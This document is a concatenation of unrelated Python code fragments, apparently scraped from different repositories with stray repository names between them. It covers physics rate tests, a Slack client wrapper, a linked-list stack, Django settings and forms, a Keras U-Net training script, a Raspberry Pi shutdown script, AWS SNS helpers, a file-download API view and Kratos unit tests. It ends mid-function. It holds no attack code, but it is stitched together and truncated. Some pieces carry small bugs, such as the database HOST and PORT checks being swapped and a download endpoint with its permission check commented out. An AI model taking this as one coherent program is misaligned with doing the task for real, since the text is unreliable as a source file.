def test_rate(): emin = 20. # u.GeV emax = 300.e3 # u.GeV spectral_index = -3. e0 = 300. # u.GeV area = 1.e9 cone = 0 norm = 1.e-11 np.testing.assert_allclose(rate(emin, emax, spectral_index, cone, area, norm, e0), 337.5, rtol=1e-3) def test_weight(): emin = 10. # u.GeV emax = 50.e3 # u.GeV sim_sp_idx = -2. w_sp_idx = -2.6 e0 = 1000. # u.GeV rate = 8. 
nev = 1.e6 np.testing.assert_allclose(weight(emin, emax, sim_sp_idx, w_sp_idx, rate, nev, e0), 8.07e-7, rtol=1e-3) flipper/slackwrapper.py from slackclient import SlackClient __all__ = [ 'SlackWrapper', ] class SlackWrapper(object): def __init__(self, slack_client=None, botid=None, token=None): self._slack_client = slack_client self.botid = botid self.token = token def connect(self): self._slack_client = SlackClient(self.token) return self._slack_client.rtm_connect() def rtm_read(self): return self._slack_client.rtm_read() def post(self, channel, message): self._slack_client.api_call( "chat.postMessage", channel=channel, text=message, as_user=True ) class Node(object): __slots__ = ('value', 'prev', 'next') def __init__(self, value=None, prev=None, next=None): self.value, self.prev, self.next = value, prev, next class CircularDoubleLinkedList(object): """循环双端链表 ADT 循环就是把root的prev指向tail节点,串起来 """ def __init__(self, maxsize=None): self.maxsize = maxsize node = Node() node.next, node.prev = node, node self.root = node self.length = 0 def __len__(self): return self.length def headnode(self): return self.root.next def tailnode(self): return self.root.prev def append(self, value): if self.maxsize is not None and len(self) >= self.maxsize: # 先看看插入的链表是否已满 raise Exception('LinkedList is full.') node = Node(value=value) tailnode = self.tailnode() tailnode.next = node node.prev = tailnode node.next = self.root self.root.prev = node self.length += 1 def appendleft(self, value): if self.maxsize is not None and len(self) >= self.maxsize: raise Exception('LinkedList is full.') node = Node(value=value) headnode = self.headnode() self.root.next = node node.prev = self.root node.next = headnode headnode.prev = node self.length += 1 def remove(self, node): """remove :param node: 传入node 而不是 value 我们就能实现 O(1) 删除 :return: """ if node is self.root: return else: node.prev.next = node.next node.next.prev = node.prev self.length -= 1 return node def iter_node(self): if self.root.next is self.root: return curnode = self.root.next while curnode.next is not self.root: yield curnode curnode = curnode.next yield curnode def __iter__(self): for node in self.iter_node(): yield node.value def iter_node_reverse(self): """相比单链表独有的反序遍历""" if self.root.prev is self.root: return curnode = self.root.prev while curnode.prev is not self.root: yield curnode curnode = curnode.prev yield curnode class DoubleEndedQueue(CircularDoubleLinkedList): def pop(self): if self.tailnode() is self.root: raise Exception('LinkedList is empty.') tailnode = self.tailnode() value = tailnode.value self.remove(tailnode) return value def popleft(self): if self.headnode() is self.root: raise Exception('LinkedList is empty.') headnode = self.headnode() value = headnode.value self.remove(headnode) return value class Stack: def __init__(self): self.deque = DoubleEndedQueue() def push(self, value): return self.deque.append(value) def pop(self): return self.deque.pop() def __len__(self): return len(self.deque) def is_empty(self): return len(self.deque) == 0 def test_stack(): s = Stack() for i in range(3): s.push(i) assert len(s) == 3 assert s.pop() == 2 assert s.pop() == 1 assert s.pop() == 0 assert s.is_empty() import pytest with pytest.raises(Exception) as excinfo: s.pop() assert 'empty' in str(excinfo.value) 1-10 """ Django settings for src project. Generated by 'django-admin startproject' using Django 3.1.1. 
For more information on this file, see https://docs.djangoproject.com/en/3.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.1/ref/settings/ """ import os from pathlib import Path # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.environ.get("SECRET_KEY") # SECURITY WARNING: don't run with debug turned on in production! DEBUG = os.environ.get("DEBUG") ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', # rest framework. "rest_framework", "rest_framework.authtoken", # Apps. "accounts", "products", "kits" ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'src.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'src.wsgi.application' # Database # https://docs.djangoproject.com/en/3.1/ref/settings/#databases # https://nesdis.github.io/djongo/ DATABASE_PASSWORD = os.environ.get("DATABASE_PASSWORD", None) DATABASE_USER = os.environ.get("DATABASE_USER", None) DATABASE_HOST = os.environ.get("DATABASE_HOST", None) DATABASE_PORT = os.environ.get("DATABASE_PORT", None) default_database_configuration = { 'ENGINE': 'djongo', 'NAME': os.environ.get("DATABASE_NAME"), } if DATABASE_PASSWORD is not None: default_database_configuration["PASSWORD"] = DATABASE_PASSWORD if DATABASE_USER is not None: default_database_configuration["USER"] = DATABASE_USER if DATABASE_PORT is not None: default_database_configuration["HOST"] = DATABASE_HOST if DATABASE_HOST is not None: default_database_configuration["PORT"] = DATABASE_PORT DATABASES = { 'default': default_database_configuration } # Password validation # https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # AUTH USER MODEL AUTH_USER_MODEL = "accounts.User" # Internationalization # https://docs.djangoproject.com/en/3.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.1/howto/static-files/ STATIC_URL = '/static/' REST_FRAMEWORK = { 'DEFAULT_PERMISSION_CLASSES': [ 
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly' ], 'DEFAULT_AUTHENTICATION_CLASSES': [ 'rest_framework_simplejwt.authentication.JWTAuthentication', ], 'DEFAULT_FILTER_BACKENDS': [ 'django_filters.rest_framework.DjangoFilterBackend' ] } APPEND_SLASH = False #!/usr/bin/env python # coding: utf-8 #

DATASET CREATION
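# A minimal sketch (not the full pipeline below) of the paired image/mask
# augmentation pattern this section relies on: two ImageDataGenerators receive
# the same transform arguments and the same seed, so every augmented image
# stays aligned with its augmented mask. Directory paths here are placeholders
# standing in for the local Imagespng/Maskspng folders used later.
from tensorflow.keras.preprocessing.image import ImageDataGenerator

aug_args = dict(rotation_range=30., horizontal_flip=True, rescale=1 / 255.)
image_gen = ImageDataGenerator(**aug_args)
mask_gen = ImageDataGenerator(**aug_args)

seed = 20  # identical seed keeps the two generators' random transforms in lockstep
image_flow = image_gen.flow_from_directory("Imagespng", class_mode=None,
                                           color_mode="grayscale",
                                           target_size=(512, 512), seed=seed)
mask_flow = mask_gen.flow_from_directory("Maskspng", class_mode=None,
                                         color_mode="grayscale",
                                         target_size=(512, 512), seed=seed)
train_pairs = zip(image_flow, mask_flow)  # yields (image_batch, mask_batch) tuples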

from __future__ import absolute_import, division, print_function, unicode_literals import scipy from scipy.ndimage import zoom, center_of_mass import tensorflow as tf import skimage.io as io import skimage.transform as trans from tensorflow import keras from tensorflow.keras import Model from tensorflow.keras.models import Sequential from tensorflow.keras.layers import * from tensorflow.keras.models import * from tensorflow.keras.optimizers import * from tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler from tensorflow.keras.preprocessing.image import ImageDataGenerator import tensorflow.keras.backend as K import pydicom as dicom from PIL import Image DSMASKS= r"J:\IA\ODIASP2\Dataset\Maskspng" DSIMAGES= r"J:\IA\ODIASP2\Dataset\Imagespng" BATCH_SIZE = 2 EPOCHS = 10 TARGETSIZE = (512,512) import imageio NAME = r"158373.dcm.npy.png" MASK = os.path.join(r"J:\IA\ODIASP2\Dataset\Maskspng\Dossier",NAME) IMAGE = os.path.join(r"J:\IA\ODIASP2\Dataset\Imagespng\Dossier",NAME) #lecture image -> numpy masque=imageio.imread(MASK) image=imageio.imread(IMAGE) print(type(masque), np.shape(masque)) masque = masque[np.newaxis,:,:,np.newaxis] image = image[np.newaxis,:,:,np.newaxis] data_gen_args = dict(rotation_range=30., horizontal_flip = True, #vertical_flip = True, width_shift_range=0.2, height_shift_range=0.2, zoom_range=0.3, fill_mode = 'nearest', validation_split = 0.1, #0.15 rescale = 1/255. #samplewise_center=True, ) image_datagen = ImageDataGenerator(**data_gen_args) mask_datagen = ImageDataGenerator(**data_gen_args) seed = 20 image_datagen.fit(image, augment=True, seed=seed) mask_datagen.fit(masque, augment=True, seed=seed) image_generator = image_datagen.flow_from_directory(DSIMAGES, class_mode=None, color_mode = "grayscale", subset = "training", target_size=TARGETSIZE, batch_size=BATCH_SIZE, seed=seed) mask_generator = mask_datagen.flow_from_directory(DSMASKS, class_mode=None, color_mode = "grayscale", subset = "training", target_size=TARGETSIZE, batch_size=BATCH_SIZE, seed=seed) image_generator_val = image_datagen.flow_from_directory(DSIMAGES, class_mode=None, color_mode = "grayscale", subset = "validation", target_size=TARGETSIZE, batch_size=BATCH_SIZE, seed=seed) mask_generator_val = mask_datagen.flow_from_directory(DSMASKS, class_mode=None, color_mode = "grayscale", subset = "validation", target_size=TARGETSIZE, batch_size=BATCH_SIZE, seed=seed) train_generator = zip(image_generator, mask_generator) val_generator = zip(image_generator_val, mask_generator_val) #strategie multiGPU strategy = tf.distribute.MirroredStrategy(devices=["/gpu:0", "/gpu:1"], cross_device_ops=tf.distribute.HierarchicalCopyAllReduce()) print("Num GPUs Available: ", len(tf.config.experimental.list_physical_devices('GPU'))) """ loss avec des poids, que j'utilise """ #https://stackoverflow.com/questions/60253082/weighting-samples-in-multiclass-image-segmentation-using-keras def balanced_cross_entropy(beta): def convert_to_logits(y_pred): y_pred = tf.clip_by_value(y_pred, tf.keras.backend.epsilon(), 1 - tf.keras.backend.epsilon()) return tf.math.log(y_pred / (1 - y_pred)) def loss(y_true, y_pred): y_pred = convert_to_logits(y_pred) pos_weight = beta / (1 - beta) loss = tf.nn.weighted_cross_entropy_with_logits(logits=y_pred, labels=y_true, pos_weight=pos_weight) return tf.math.reduce_mean(loss * (1 - beta)) return loss def unet( pretrained_weights = None, input_size = (512,512,1) ): inputs = Input(input_size) initial = 96 initx2 = initial * 2 initx4 = initx2 * 2 initx8 = initx4 * 2 initx16 = initx8 * 2 
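# The layers below form a standard U-Net: an encoder of five levels, each with
# two 3x3 SELU convolutions (96, 192, 384, 768 and 1536 filters) separated by
# 2x2 max pooling, with 0.5 dropout on the two deepest levels; the decoder
# upsamples, concatenates the matching encoder features (skip connections),
# and finishes with a 1x1 sigmoid convolution that outputs the binary mask.
# The model is compiled with Adam(lr=1e-4) and the weighted
# balanced_cross_entropy(0.2) loss defined above.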
conv1 = Conv2D(initial, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(inputs) conv1 = Conv2D(initial, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv1) pool1 = MaxPooling2D(pool_size=(2, 2))(conv1) conv2 = Conv2D(initx2, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(pool1) conv2 = Conv2D(initx2, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv2) pool2 = MaxPooling2D(pool_size=(2, 2))(conv2) conv3 = Conv2D(initx4, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(pool2) conv3 = Conv2D(initx4, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv3) pool3 = MaxPooling2D(pool_size=(2, 2))(conv3) conv4 = Conv2D(initx8, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(pool3) conv4 = Conv2D(initx8, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv4) drop4 = Dropout(0.5)(conv4) pool4 = MaxPooling2D(pool_size=(2, 2))(drop4) conv5 = Conv2D(initx16, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(pool4) conv5 = Conv2D(initx16, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv5) drop5 = Dropout(0.5)(conv5) up6 = Conv2D(initx8, 2, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(drop5)) merge6 = concatenate([drop4,up6], axis = 3) conv6 = Conv2D(initx8, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(merge6) conv6 = Conv2D(initx8, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv6) up7 = Conv2D(initx4, 2, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6)) merge7 = concatenate([conv3,up7], axis = 3) conv7 = Conv2D(initx4, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(merge7) conv7 = Conv2D(initx4, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv7) up8 = Conv2D(initx2, 2, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7)) merge8 = concatenate([conv2,up8], axis = 3) conv8 = Conv2D(initx2, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(merge8) conv8 = Conv2D(initx2, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv8) up9 = Conv2D(initial, 2, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8)) merge9 = concatenate([conv1,up9], axis = 3) conv9 = Conv2D(initial, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(merge9) conv9 = Conv2D(initial, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv9) conv9 = Conv2D(2, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv9) conv10 = Conv2D(1, 1, activation = 'sigmoid')(conv9) model = Model(inputs = inputs, outputs = conv10) model.compile(optimizer=Adam(lr = 1e-4), loss = balanced_cross_entropy(0.2), metrics = ['accuracy']) #model.compile(optimizer = SGD(lr=0.0001, decay=1e-5, momentum=0.9, nesterov=True), loss = 'binary_crossentropy', metrics = ['accuracy']) #Adam(lr = 1e-4) if(pretrained_weights): model.load_weights(pretrained_weights) return model with strategy.scope(): modelSegMuscles = unet(pretrained_weights = None) from tensorflow.keras.callbacks import LearningRateScheduler class 
LearningRateReducerCb(tf.keras.callbacks.Callback): def on_epoch_end(self, epoch, logs={}): old_lr = self.model.optimizer.lr.read_value() new_lr = old_lr * 0.9 print("\nEpoch: {}. Reducing Learning Rate from {} to {}".format(epoch, old_lr, new_lr)) self.model.optimizer.lr.assign(new_lr) callbacks=[LearningRateReducerCb()] hist= modelSegMuscles.fit(train_generator, steps_per_epoch=647//BATCH_SIZE, epochs=EPOCHS, validation_data=val_generator, #callbacks=callbacks, validation_steps=71//BATCH_SIZE ) # Plot training & validation accuracy values plt.plot(hist.history['accuracy']) plt.plot(hist.history['val_accuracy']) plt.title('Model accuracy') plt.ylabel('Accuracy') plt.xlabel('Epoch') plt.legend(['Train', 'Test'], loc='upper left') plt.show() # Plot training & validation loss values plt.plot(hist.history['loss']) plt.plot(hist.history['val_loss']) plt.title('Model loss') plt.ylabel('Loss') plt.xlabel('Epoch') plt.legend(['Train', 'Test'], loc='upper left') plt.show() import time import os import smbus import RPi.GPIO as GPIO bus = smbus.SMBus(1) GPIO.setmode(GPIO.BCM) GPIO.setup(4, GPIO.IN,pull_up_down=GPIO.PUD_UP) # function to shut down Pi def Int_shutdown(channel): # wait ten seconds time.sleep(5) # shutdown Raspberry Pi if power is still down if (GPIO.input(4) == False): os.system("sudo shutdown -h now") return #start I2C communication to disable hardware reset from I/O Module out_values = [0x00] bus.write_i2c_block_data(0x1C ,0,out_values) #add interrupt GPIO.add_event_detect(4, GPIO.FALLING, callback = Int_shutdown, bouncetime = 2000) # do nothing while waiting for power failure while 1: time.sleep(1) 0 import boto3 def client(): return boto3.client("sns") def all_topics(): return client().list_topics() def find_topic(topic_name): res = all_topics() for t in res["Topics"]: arn = t.get("TopicArn", "") if arn.find(topic_name) >= 0: return t def publish(topic_arn, message, subject=None): body = {"Message": message} if subject: body["Subject"] = subject return client().publish(TopicArn=topic_arn, **body) def publish_by_name(topic_name, message, subject=None): topic = find_topic(topic_name) return topic and publish(topic["TopicArn"], message, subject=subject) def get_sns_message_from_event(event): prefix = "Records" node = "Sns" if prefix in event and len(event[prefix]) > 0: if node in event[prefix][0]: return event[prefix][0][node] 1-10 # -*- encoding: utf-8 -*- # Module ianshow import ia636 as ia import numpy as np def t(s,dt=1): a = ia.iatext(s) b = np.pad(a,((6+3-dt,6+3-dt),(0+3-dt,0+3-dt)),'constant', constant_values=((False,False),(False,False))) c = np.pad(b,((dt,dt),(dt,dt)),'constant', constant_values=((True,True),(True,True))) return c def timg(f,dt=1): tFalse = t(' ',dt) dy, dx = tFalse.shape tTrue = np.zeros_like(tFalse) z = np.empty(tuple(np.array(f.shape) * np.array([dy,dx]))).astype(bool) if f.dtype == 'bool': for x in np.arange(f.shape[-1]): for y in np.arange(f.shape[-2]): if f[y,x]: z[y*dy:y*dy+dy,x*dx:x*dx+dx] = tFalse else: z[y*dy:y*dy+dy,x*dx:x*dx+dx] = tTrue z=~np.pad(z,((1,1),(1,1)),'constant') else: for x in np.arange(f.shape[-1]): for y in np.arange(f.shape[-2]): z[y*dy:y*dy+dy,x*dx:x*dx+dx] = t('%3d' % f[y,x],dt) z=np.pad(~z,((1,1),(1,1)),'constant') return z def ianshow(X, X1=None, X2=None, X3=None, X4=None, X5=None, X6=None): x = timg(X) x1,x2,x3,x4,x5,x6 = None,None,None,None,None,None if X1 is not None: x1 = ~timg(X1,3) if X2 is not None: x2 = ~timg(X2,3) if X3 is not None: x3 = ~timg(X3,3) if X4 is not None: x4 = ~timg(X4,3) if X5 is not None: x5 = ~timg(X5,3) 
if X6 is not None: x6 = ~timg(X6,3) return ia.iagshow(x,x1,x2,x3,x4,x5,x6) base/base_data_loader.py import numpy as np import pytorch_lightning as pl from box import Box from torch.utils.data import DataLoader, random_split from torch.utils.data.dataloader import default_collate from torch.utils.data.sampler import SubsetRandomSampler class BaseDataLoader(pl.LightningDataModule): """ Base class for all data loaders """ def __init__(self, dataset, batch_size, shuffle, validation_split, num_workers, collate_fn=default_collate): super().__init__() self.validation_split = validation_split self.shuffle = shuffle self.batch_idx = 0 self.n_samples = len(dataset) self.init_kwargs = Box({ 'dataset': dataset, 'batch_size': batch_size, 'shuffle': self.shuffle, 'collate_fn': collate_fn, 'num_workers': num_workers }) def setup(self, stage=None): if self.validation_split == 0.0: return None, None idx_full = np.arange(self.n_samples) np.random.seed(0) np.random.shuffle(idx_full) if isinstance(self.validation_split, int): assert self.validation_split > 0 assert self.validation_split < self.n_samples, "validation set size is configured to be larger than entire dataset." len_valid = self.validation_split else: len_valid = int(self.n_samples * self.validation_split) valid_idx = idx_full[0:len_valid] train_idx = np.delete(idx_full, np.arange(0, len_valid)) train_sampler, valid_sampler = random_split(self.init_kwargs.dataset, [len(train_idx), len(valid_idx)]) # turn off shuffle option which is mutually exclusive with sampler self.shuffle = False self.n_samples = len(train_idx) self.train_sampler = train_sampler self.valid_sampler = valid_sampler def train_dataloader(self): return DataLoader(self.train_sampler, batch_size=self.init_kwargs.batch_size) def val_dataloader(self): return DataLoader(self.valid_sampler, batch_size=self.init_kwargs.batch_size) def test_dataloader(self): return DataLoader(self.valid_sampler, batch_size=self.init_kwargs.batch_size) def split_validation(self): if self.valid_sampler is None: return None else: return DataLoader(sampler=self.valid_sampler, **self.init_kwargs) 1-10 from django.apps import AppConfig class WebcamCaptureConfig(AppConfig): name = 'webcam_capture' # Same as in BMW. 
Dynamic Object Creation.#!/usr/bin/env python # encoding: utf-8 from django import forms from .models import UserProfile from captcha.fields import CaptchaField class RegisterForm(forms.Form): username = forms.CharField(required=True) email = forms.EmailField(required=True) #前端添加再次输入密码的功能 password1 = forms.CharField(required=True, widget=forms.PasswordInput, min_length=6) password2 = forms.CharField(required=True, widget=forms.PasswordInput, min_length=6) class LoginForm(forms.Form): username = forms.CharField(required=True) password= forms.CharField(required=True, widget=forms.PasswordInput, min_length=6) class ActiveForm(forms.Form): # 激活时不对邮箱密码做验证 # 应用验证码, 自定义错误输出key必须与异常一样 captcha = CaptchaField(error_messages={'invalid': u'验证码错误'}) class ChangePasswordForm(forms.Form): previousPassword = forms.CharField(required=True, widget=forms.PasswordInput, min_length=6) newPassword1 = forms.CharField(required=True, widget=forms.PasswordInput, min_length=6) newPassword2 = forms.CharField(required=True, widget=forms.PasswordInput, min_length=6) class UserCenterForm(forms.ModelForm): class Meta: model = UserProfile fields = ['nickname', 'gender', 'birthday']fairain/FasterRunner import os import json from django.core.exceptions import ObjectDoesNotExist from django.utils.decorators import method_decorator from django.http import FileResponse from rest_framework.views import APIView from rest_framework.response import Response from rest_framework import status from rest_framework.permissions import DjangoModelPermissions from fastrunner.utils import response from fastrunner.utils.decorator import request_log from fastrunner.utils.writeExcel import write_excel_log from fastrunner.utils.permissions import IsBelongToProject from fastrunner import models from FasterRunner.settings import MEDIA_ROOT class DownloadView(APIView): """下载文件接口 """ # permission_classes = (DjangoModelPermissions, IsBelongToProject) @method_decorator(request_log(level='DEBUG')) def post(self, request, **kwargs): """下载文件 请求参数:{ fileType: int (1:testdata, 2: report_excel 3: report_html) id: int, project: int } """ try: file_type = int(request.data["fileType"]) idno = int(request.data["id"]) project = int(request.data["project"]) except KeyError: return Response(response.KEY_MISS, status=status.HTTP_400_BAD_REQUEST) try: if file_type == 1: fileObject = models.ModelWithFileField.objects.get(project_id=project, id=idno) filename = fileObject.name filepath = os.path.join(MEDIA_ROOT, str(fileObject.file)) else: fileObject = models.ReportDetail.objects.get(project_id=project, report_id=idno) filename = fileObject.name summary = json.loads(fileObject.summary) filepath = write_excel_log(summary) fileresponse = FileResponse(open(filepath, 'rb')) fileresponse["Content-Type"] = "application/octet-stream" fileresponse["Content-Disposition"] = "attachment;filename={}".format(filename) return fileresponse except ObjectDoesNotExist: return Response(response.FILE_DOWNLOAD_FAIL, status=status.HTTP_400_BAD_REQUEST) import os import warnings import click from .elastic import (create_es_instance, run_note_upload, run_zotero_upload, stream_pdfs) from .interface.search import basic_search, search_format from .interface.term import SearchApp warnings.filterwarnings(action='ignore') @click.group() def cli(): ... 
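# Note: the 'search' and 'upload' commands below both use the function name
# upload_folder. Click registers each command when its decorator runs, so both
# commands still work, but the module-level name is silently rebound; giving
# each callback a distinct name would be clearer.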
@cli.command(name='start', help="Start search application") def start_shell(): SearchApp.run(log="textual.log") @cli.command(name='search', help='Do a single search') @click.argument("phrase", type=str) def upload_folder(phrase: os.PathLike): es_instance = create_es_instance() results = basic_search(es_instance, phrase, "notes") search_format(results) @cli.command(name='upload', help='Upload a given folder to ES') @click.argument("path", type=click.Path(exists=True)) def upload_folder(path: os.PathLike): run_note_upload(path, stream_fn=stream_pdfs) print("Upload completed successfully") @cli.command(name='zotero-upload', help='Upload zotero data to ES') def upload_zotero(): # TODO: check for the environment secrets run_zotero_upload() print("Upload completed successfully") if __name__ == "__main__": cli() import KratosMultiphysics as Kratos import KratosMultiphysics.StatisticsApplication as KratosStats import KratosMultiphysics.KratosUnittest as KratosUnittest from KratosMultiphysics.StatisticsApplication.spatial_utilities import GetItemContainer from KratosMultiphysics.StatisticsApplication.method_utilities import GetNormTypeContainer from KratosMultiphysics.StatisticsApplication.method_utilities import GetMethod from KratosMultiphysics.StatisticsApplication.test_utilities import CheckValues from KratosMultiphysics.StatisticsApplication.test_utilities import CreateModelPart from KratosMultiphysics.StatisticsApplication.test_utilities import InitializeModelPartVariables from KratosMultiphysics.StatisticsApplication.test_utilities import GetInitialVariableValue class SpatialMethodTests(KratosUnittest.TestCase): def setUp(self): self.model = Kratos.Model() self.model_part = self.model.CreateModelPart("test_model_part") self.containers_to_test = [ "nodal_historical", "nodal_non_historical", "element_non_historical", "condition_non_historical" ] self.test_cases = {} self.test_cases[Kratos.PRESSURE] = ["none", "magnitude", "value"] self.test_cases[Kratos.VELOCITY] = [ "none", "magnitude", "component_x", "component_y", "component_z" ] self.test_cases[Kratos.LOAD_MESHES] = [ "magnitude", "index_0", "index_1", "index_2", "index_4" ] self.test_cases[Kratos.GREEN_LAGRANGE_STRAIN_TENSOR] = [ "frobenius", "index_(0,0)", "index_(0,1)", "index_(4,1)", "index_(1,1)" ] self.norm_only_methods = ["min", "max", "median", "distribution"] SpatialMethodTests.__AddNodalSolutionStepVariables(self.model_part) CreateModelPart(self.model_part) InitializeModelPartVariables(self.model_part) def tearDown(self): # Code here will be placed AFTER every test in this TestCase. 
pass def testSumMethod(self): def analytical_method(container, container_type, norm_type, variable): analytical_value = GetInitialVariableValue(variable, norm_type) for item in container: analytical_value += SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) return analytical_value self.__TestMethod("sum", analytical_method) def testRootMeanSquareMethod(self): def analytical_method(container, container_type, norm_type, variable): analytical_value = GetInitialVariableValue(variable, norm_type) for item in container: analytical_value += KratosStats.MethodUtilities.RaiseToPower( SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type), 2) return KratosStats.MethodUtilities.RaiseToPower( analytical_value * (1.0 / len(container)), 0.5) self.__TestMethod("rootmeansquare", analytical_method) def testMeanMethod(self): def analytical_method(container, container_type, norm_type, variable): analytical_value = GetInitialVariableValue(variable, norm_type) for item in container: analytical_value += SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) return analytical_value / len(container) self.__TestMethod("mean", analytical_method) def testVarianceMethod(self): def analytical_method(container, container_type, norm_type, variable): mean_value = GetInitialVariableValue(variable, norm_type) variance_value = GetInitialVariableValue(variable, norm_type) for item in container: current_value = SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) mean_value += current_value variance_value += KratosStats.MethodUtilities.RaiseToPower( current_value, 2) n = len(container) mean_value /= n variance_value = variance_value / n - KratosStats.MethodUtilities.RaiseToPower( mean_value, 2) return mean_value, variance_value self.__TestMethod("variance", analytical_method) def testMinMethod(self): def analytical_method(container, container_type, norm_type, variable): analytical_value = 1e+12 for item in container: current_value = SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) if (current_value < analytical_value): analytical_value = current_value analytical_id = item.Id return analytical_value, analytical_id self.__TestMethod("min", analytical_method) def testMaxMethod(self): def analytical_method(container, container_type, norm_type, variable): analytical_value = -1e+12 for item in container: current_value = SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) if (current_value > analytical_value): analytical_value = current_value analytical_id = item.Id return analytical_value, analytical_id self.__TestMethod("max", analytical_method) def testMedianMethod(self): def analytical_method(container, container_type, norm_type, variable): item_values = [] for item in container: current_value = SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) item_values.append(current_value) item_values = sorted(item_values) n = len(item_values) if (n % 2 != 0): return item_values[n // 2] else: return (item_values[(n - 1) // 2] + item_values[n // 2]) * 0.5 self.__TestMethod("median", analytical_method) def testDistributionMethod(self): default_parameters = Kratos.Parameters(""" { 
"number_of_value_groups" : 10, "min_value" : "min", "max_value" : "max" }""") def analytical_method(container, container_type, norm_type, variable): item_values = [] for item in container: current_value = SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) item_values.append(current_value) min_value = min(item_values) max_value = max(item_values) group_limits = [ min_value + (max_value - min_value) * i / 10 for i in range(11) ] group_limits[-1] += 1e-16 group_limits.append(1e+100) data_distribution = [0 for i in range(len(group_limits))] mean_distribution = [0.0 for i in range(len(group_limits))] variance_distribution = [0.0 for i in range(len(group_limits))] for value in item_values: for i, v in enumerate(group_limits): if (value < v): data_distribution[i] += 1 mean_distribution[i] += value variance_distribution[i] += value**2.0 break percentage_data_distribution = [] for i, _ in enumerate(group_limits): percentage_data_distribution.append(data_distribution[i] / len(item_values)) if (data_distribution[i] > 0): mean_distribution[i] /= data_distribution[i] variance_distribution[i] /= data_distribution[i] variance_distribution[i] -= mean_distribution[i]**2.0 group_limits[-2] -= 1e-16 group_limits[-1] = max_value return min_value, max_value, group_limits, data_distribution, percentage_data_distribution, mean_distribution, variance_distribution self.__TestMethod("distribution", analytical_method, default_parameters) def __TestMethod(self, test_method_name, analytical_method, method_params=Kratos.Parameters("""{}""")): for container_type in self.containers_to_test: container = SpatialMethodTests.__GetContainer( self.model_part, container_type) item_method_container = GetItemContainer(container_type) for variable, norm_types in self.test_cases.items(): for norm_type in norm_types: item_method_norm_container = GetNormTypeContainer( item_method_container, norm_type) if (norm_type == "none" and test_method_name in self.norm_only_methods): continue test_method = GetMethod(item_method_norm_container, test_method_name) if (norm_type == "none"): method_value = test_method(self.model_part, variable) else: method_value = test_method(self.model_part, variable, norm_type, method_params) analytical_value = analytical_method( container, container_type, norm_type, variable) CheckValues(self, analytical_value, method_value, 10) @staticmethod def __AddNodalSolutionStepVariables(model_part): 